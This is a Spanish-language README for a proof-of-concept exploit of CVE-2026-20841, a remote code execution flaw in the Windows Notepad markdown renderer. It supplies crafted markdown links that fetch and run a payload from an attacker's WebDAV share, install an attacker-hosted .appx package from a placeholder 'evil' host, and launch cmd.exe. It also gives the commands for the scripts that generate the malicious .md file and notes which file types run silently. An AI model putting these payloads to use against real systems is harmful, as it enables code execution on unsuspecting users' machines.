
Prueba de concepto de exploit para CVE-2026-20841, una RCE en el Bloc de notas de Windows mediante enlaces de Markdown. Genera archivos .md manipulados para activar cargas útiles remotas, sideloading de aplicaciones o ejecución de binarios locales.
PoC para una falla de ejecución remota de código en el renderizador de markdown del Bloc de Notas de Windows. El motor de markdown no restringe los protocolos de URL, lo que permite activar manejadores de protocolo arbitrarios mediante enlaces clicables.
file:///)[click](file:///\\attacker@5005\DavWWWRoot\payload.py)
El protocolo file:/// resuelve rutas UNC remotas. Vincula una carga útil y Windows la buscará y ejecutará al hacer clic.
ms-appinstaller://)[click](ms-appinstaller://?source=https://evil/xxx.appx)
Abre el Instalador de aplicaciones con un paquete .appx/.msix proporcionado por el atacante.
file://)[click](file://C:/windows/system32/cmd.exe)
Lanza cualquier ejecutable ya presente en el disco: cmd.exe, powershell.exe, mshta.exe, etc.
Ambos scripts generan un poc.md con un enlace manipulado en el directorio actual.
node poc.js <host> <port> <payload/path>
python poc.py <host> <port> <payload/path>
# ejemplo
node poc.js 192.168.1.100 5005 hello.py
notepad poc.md
Cargas útiles de prueba en payloads/.
.exe, .lnk, .vbs y similares activan una advertencia de seguridad de Windows independientemente del comportamiento del Bloc de Notas..py y .jar se ejecutan silenciosamente si Python o Java están instalados en el objetivo.¡Mantente a salvo!